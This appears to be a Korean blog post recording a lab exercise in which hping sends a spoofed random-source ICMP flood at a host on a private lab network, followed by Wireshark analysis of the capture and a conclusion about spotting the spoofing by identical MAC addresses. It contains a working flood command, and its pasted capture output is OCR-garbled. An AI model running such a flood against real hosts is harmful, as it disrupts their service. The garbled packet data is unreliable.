2020. 7. 14.

[Network] hping를 이용한 random dos 실습


    1. 구성과 계획
    • 네트워크 구성도
    피해자 att7 - 192.168.10.150/00:0c:29:a1:3f:e0
    공격자 att6 - 192.168.10.149/00:0C:29:C6:9A:42
    감시자 att5 - 192.168.10.148/00:0C:29:5D:87:05

    • 과정 정리
    step1. att5 tcpdump 캡쳐
    step2. att6 hping 공격 실행
    step3. wireshark 캡쳐본 분석

    1. 관련내용정리
    hping : dos 실습을 위해 네트워크 패킷을 변조하여 보낼수 있는 프로그램
    random dos : ip 랜덤하게 변조하여 보내는 공격

    1. 실습과정
    step1. att5 tcpdump 캡쳐
    tcpdump -xX -w randomdos.cap
    step2. att6 hping 공격 실행
    hping --icmp --rand-source 192.168.10.150 -d 1 --flood
    step3. wireshark 캡쳐본 분석
    wireshark on
    filtering : ip.addr == 192.168.10.150
    138. 59. 137.99 
192. 168.10. 150 
81. 77.30. 115 
192. 168.10. 150 
184. 136. 108.74 
192. 168.10. 150 
163 . 138. 74. 177 
192. 168.10. 150 
27. 165 . 206. 62 
192. 168.10. 150 
145 137.221 
192. 168.10. 150 
85.79.27.97 
192. 168.10. 150 
ICMP 
ICMP 
ICMP 
ICMP 
ICMP 
ICMP 
ICMP 
60 
60 
60 
60 
60 
60 
60 
Echo 
Echo 
Echo 
Echo 
Echo 
Echo 
Echo 
(ping) 
(ping) 
(ping) 
(ping) 
(ping) 
(ping) 
(ping) 
request 
request 
request 
request 
request 
request 
request 
id=0xa30c, 
id=0xa30c, 
id=0xa30c, 
id=0xa30c, 
id=0xa30c, 
id=0xa30c, 
id=0xa30c, 
seq=49664/194, 
seq=49920/195, 
=50176/196, 
seq 
-50432/197, 
seq— 
=50688/198, 
seq 
50944/199, 
seq= 
-51200/200, 
seq—
    랜덤한 ip icmp 패킷이 전달되고 있다.
    00 
42 08 
οο 
οο 
40 01 
58 οο οο οο οο οο 
29 
1d 
96 08 οο 
92 
32 
00 
+2 
81 
00 
89 
45 
οο 
28 
οο 
.2
    00 
οο 
2+ οο 
40 01 
58 οο οο οο οο οο 
29 
1d 
96 08 οο 
31 
00 
+2 
30 
21 
71 
4 
98 
08 
00 
+9 
45 
00 
28 
0. 
.1
    같은 주소로 들어오고 있는것을 확인함으로써 rand 공격임을 있다.

    1. 결론
    와이어샤크로 확인하면 모든 ip 맥주소가 같고 같은 네트워크에서 공격받는것이라면 모든 ip ping 던져서 확인하면된다.

댓글 없음:

댓글 쓰기